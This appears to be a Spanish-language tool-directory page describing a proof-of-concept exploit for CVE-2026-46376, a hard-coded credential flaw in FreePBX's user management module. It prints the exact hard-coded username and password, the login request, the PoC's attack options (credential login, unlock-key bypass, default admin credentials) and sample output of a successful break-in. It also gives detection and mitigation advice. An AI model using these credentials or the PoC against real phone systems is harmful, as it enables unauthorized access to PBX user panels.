Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-46376 — CVE-2026-46376 - Acceso UCP no autenticado a FreePBX mediante credenciales codificadas | Kitploit
Herramientas/GitHubGitHub/portbuster1337/cve-2026-46376
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónPapers e InvestigaciónAprendizaje y Educación
GitHubportbuster1337/cve-2026-46376

CVE-2026-46376

CVE-2026-46376 - Acceso UCP no autenticado a FreePBX mediante credenciales codificadas

Ver Repositorio
hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-46376 — Acceso no autenticado a UCP de FreePBX mediante credenciales codificadas

Una vulnerabilidad crítica en el módulo de Gestión de Usuarios (userman) de FreePBX permite a atacantes no autenticados acceder al Panel de Control de Usuario (UCP) utilizando credenciales codificadas que se incrustan durante el proceso de configuración de plantillas genéricas de UCP.

CVSS v4.0: 9.1 (Crítico) | CWE-798: Uso de credenciales codificadas

Divulgado: 15 de mayo de 2026 | Reportero: s0nnyWT

Detalles

Cuando un administrador utiliza la función opcional de configuración de plantillas genéricas de UCP (introducida en 2021), se crea un usuario de sistema FreePBXUCPTemplateCreator con una contraseña codificada y estática. Si el administrador nunca cambia esta contraseña después de la configuración, cualquier usuario no autenticado en la red puede iniciar sesión en el UCP con estas credenciales.

CampoValor
UsuarioFreePBXUCPTemplateCreator
Contraseña1a2b3c@fd48jshs03123ld
FuenteUserman.class.php — contraseña procesada mediante md5()
Vector de ataqueRed
ComplejidadBaja
Autenticación requeridaNinguna
Interacción del usuarioNinguna
Requisito previoEl administrador debe haber ejecutado la configuración de plantillas genéricas de UCP

Nota: El usuario FreePBXUCPTemplateCreator solo se crea si un administrador ejecuta explícitamente la función de configuración de plantillas genéricas de UCP. Los sistemas donde esta configuración nunca se realizó no son explotables a través de este CVE, incluso si ejecutan una versión afectada.

Versiones afectadas

La corrección aleatoriza la contraseña mediante bin2hex(random_bytes(24)) durante la instalación/actualización, y los creadores de plantillas existentes ven regenerada su contraseña al actualizar.

Uso del PoC

root@kitploit:~
pip3 install requests
python3 poc.py <target_url>

Opciones

root@kitploit:~
positional arguments:
  target              Target URL (e.g. http://192.168.1.100)

optional arguments:
  -h, --help          show this help message and exit
  --no-check          Skip version pre-flight check
  --timeout TIMEOUT   Request timeout in seconds (default: 15)
  --method {creds,unlock,admin,all}
                      Which exploit method to run (default: all)
  -y, --yes           Auto-continue even if version is out of range

Métodos

  1. creds — Iniciar sesión en UCP mediante POST /ucp/ajax.php con module=User&command=login usando las credenciales codificadas
  2. unlock — Intentar eludir la clave de desbloqueo mediante los parámetros de consulta ?unlockkey=&templateid=
  3. admin — Probar credenciales de administrador predeterminadas comunes en el ACP

Ejemplo

root@kitploit:~
$ python3 poc.py http://192.168.1.100

============================================
  CVE-2026-46376 PoC - FreePBX UCP Access
  Target: http://192.168.1.100
============================================

[+] Target is reachable (HTTP 200)
[+] FreePBX version: 16.0.30
[+] Version 16.0.30 is in the affected range
[+] UCP interface is accessible

============================================
  Exploitation
============================================

============================================
  Method 1: Hard-Coded UCP Credentials
============================================
    Username: FreePBXUCPTemplateCreator
    Password: 1a2b3c@fd48jshs03123ld
[+] Got CSRF token: a749bea059fa66bd32087a8481a4d07b
[+] SUCCESS! Logged in as FreePBXUCPTemplateCreator

============================================
  Summary
============================================
Target is VULNERABLE

Detección

Para comprobar si un sistema es explotable, el PoC envía una solicitud de inicio de sesión a POST /ucp/ajax.php con module=User&command=login y las credenciales. Una respuesta {"status":true} indica que el usuario creador de plantillas existe y que la contraseña sigue siendo la predeterminada.

Una respuesta {"status":false,"message":"Invalid Login Credentials"} significa que:

  • El usuario no existe (la configuración de plantillas nunca se ejecutó), o
  • La contraseña ya ha sido rotada

Mitigación

  • Actualizar el módulo userman a 16.0.45 (FreePBX 16) o 17.0.7 (FreePBX 17)
  • Verificar y rotar cualquier credencial de plantilla UCP existente — la aplicación del parche NO modifica retroactivamente las contraseñas ya implementadas
  • Restringir el acceso a ACP/UCP a redes de confianza mediante el módulo FreePBX Firewall
  • Habilitar MFA o SAML como capas adicionales de autenticación
  • Auditar las sesiones UCP activas en busca de inicios de sesión no autorizados

Aviso legal

Este PoC se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El uso no autorizado de este exploit contra sistemas que no posee o para los que no tiene permiso explícito de prueba es ilegal. Los autores no son responsables de ningún uso indebido o daño causado por esta herramienta.

Referencias

  • GHSA-m55x-h47x-v3gx
  • NVD - CVE-2026-46376
  • Commit de FreePBX userman (introducción)
Descargar herramienta
PlataformaMódulo usermanAfectadaCorregida
FreePBX 15—15.0.42+N/D
FreePBX 16userman≤ 16.0.4416.0.45
FreePBX 17userman≤ 17.0.617.0.7